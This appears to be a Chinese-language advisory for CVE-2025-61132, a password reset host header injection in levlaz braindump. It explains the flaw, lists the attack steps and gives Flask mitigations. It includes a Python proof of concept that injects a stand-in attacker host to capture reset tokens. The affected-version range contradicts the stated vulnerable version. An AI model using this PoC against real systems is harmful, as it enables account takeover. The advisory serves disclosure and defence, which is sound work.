CVE-2025-61132 levlaz braindump 密码重置主机头注入漏洞

漏洞信息

漏洞编号

CVE-2025-61132

漏洞类型

主机头注入（Host Header Injection）

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

levlaz braindump

漏洞概述

CVE-2025-61132是levlaz braindump v0.4.14版本中存在的一个高危安全漏洞，位于密码重置功能组件中。该漏洞属于主机头注入（Host Header Injection）类型，攻击者可通过对Host请求头进行恶意操控，诱导应用程序生成指向外部恶意站点的密码重置链接。当用户收到并点击这类伪造的密码重置邮件时，其重置令牌会被发送到攻击者控制的服务器，从而导致密码重置中毒攻击（Password Reset Poisoning），最终实现未经授权的账户接管。漏洞的根本原因在于Flask框架的url_for(_external=True)方法在生成外部URL时依赖Host头信息，而应用程序未对SERVER_NAME进行固定配置，使得URL生成过程容易被攻击者操纵。此漏洞无需特殊权限即可利用，只需低权限用户身份即可触发，且无需用户交互即可完成攻击链，对系统机密性、完整性和可用性均构成威胁。

技术细节

该漏洞存在于levlaz braindump的认证模块中，具体位于app/auth/views.py的密码重置功能实现。漏洞原理如下：Flask应用程序在处理密码重置请求时，使用url_for(_external=True)方法生成包含重置令牌的外链URL。由于应用程序未显式配置Flask的SERVER_NAME参数，url_for会动态使用HTTP请求中的Host头值来构建完整的URL。攻击者可构造如下恶意请求：发送一个包含任意Host头的密码重置请求（如Host: evil.com），Flask将使用该Host头值生成密码重置链接（如https://evil.com/reset-password?token=xxx）。当应用程序向用户发送包含此链接的邮件后，用户的密码重置令牌将被发送至攻击者服务器。攻击者获取令牌后即可重置用户密码，实现账户接管。漏洞利用的关键代码位于视图函数的URL生成逻辑和邮件模板的链接渲染部分。攻击者只需构造一个带有伪造Host头的HTTP请求即可触发漏洞，无需任何特殊权限或用户交互。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统使用levlaz braindump v0.4.14，并发现其密码重置功能存在主机头注入漏洞

STEP 2

步骤2

攻击者收集目标用户的电子邮箱地址，通常通过注册页面、用户枚举或其他信息泄露途径获取

STEP 3

步骤3

攻击者向目标服务器的密码重置端点（如/forgot）发送HTTP请求，在Host头中注入攻击者控制的恶意域名

STEP 4

步骤4

服务器接收到请求后，由于未配置固定的SERVER_NAME，Flask的url_for(_external=True)方法会使用攻击者提供的Host头值生成密码重置链接

STEP 5

步骤5

服务器向受害者邮箱发送包含伪造重置链接的邮件，链接指向攻击者控制的服务器（如https://evil.attacker.com/reset?token=xxx）

STEP 6

步骤6

受害者在收到邮件后，由于信任来自目标系统的邮件，会点击恶意链接完成密码重置操作

STEP 7

步骤7

攻击者在自己的服务器日志中捕获受害者点击链接时发送的密码重置令牌

STEP 8

步骤8

攻击者使用捕获的令牌向服务器发起密码重置请求，成功重置受害者账户密码，实现账户接管

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # CVE-2025-61132 Password Reset Host Header Injection PoC # Target: levlaz braindump v0.4.14 TARGET_URL = "http://target-server.com" # Replace with actual target ATTACKER_HOST = "evil.attacker.com" # Replace with attacker controlled server def exploit_host_header_injection(): """ Perform Host Header Injection attack for password reset poisoning. Steps: 1. Send password reset request with malicious Host header 2. Wait for victim to click the crafted reset link 3. Capture the reset token from the attacker server logs 4. Use token to reset victim's password """ # Step 1: Request password reset with injected Host header reset_endpoint = f"{TARGET_URL}/forgot" headers = { "Host": ATTACKER_HOST, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } data = { "email": "[email protected]" # Target victim's email } print(f"[*] Sending password reset request to {TARGET_URL}") print(f"[*] Injecting Host header: {ATTACKER_HOST}") try: response = requests.post(reset_endpoint, data=data, headers=headers, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") print(f"[*] Check {ATTACKER_HOST} logs for captured reset tokens") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") def check_vulnerability(): """ Check if the target is vulnerable by observing Host header reflection. """ check_endpoint = f"{TARGET_URL}/forgot" test_headers = { "Host": "test.injection.com", "User-Agent": "Vulnerability Scanner" } response = requests.get(check_endpoint, headers=test_headers, allow_redirects=False) # Check if the response contains references to the injected host if "test.injection.com" in response.text or "test.injection.com" in str(response.headers): print("[!] Target appears to be vulnerable to Host Header Injection") return True else: print("[-] Target does not appear to be vulnerable") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-61132 Host Header Injection PoC") print("Target: levlaz braindump v0.4.14") print("=" * 60) # First check if vulnerable is_vulnerable = check_vulnerability() if is_vulnerable: print("\n[*] Proceeding with exploitation...") exploit_host_header_injection()

影响范围

levlaz braindump < 0.4.14

防御指南

临时缓解措施

在Flask应用的配置中显式设置app.config['SERVER_NAME']为应用程序的正式域名，可临时缓解此漏洞。同时在Web服务器（Nginx/Apache）配置中添加Host头验证规则，拒绝或重写不合法的Host头请求。长期来看，应及时升级到levlaz官方发布的安全补丁版本，并审查所有使用url_for(_external=True)的代码路径，确保URL生成使用固定的域名配置而非依赖动态Host头。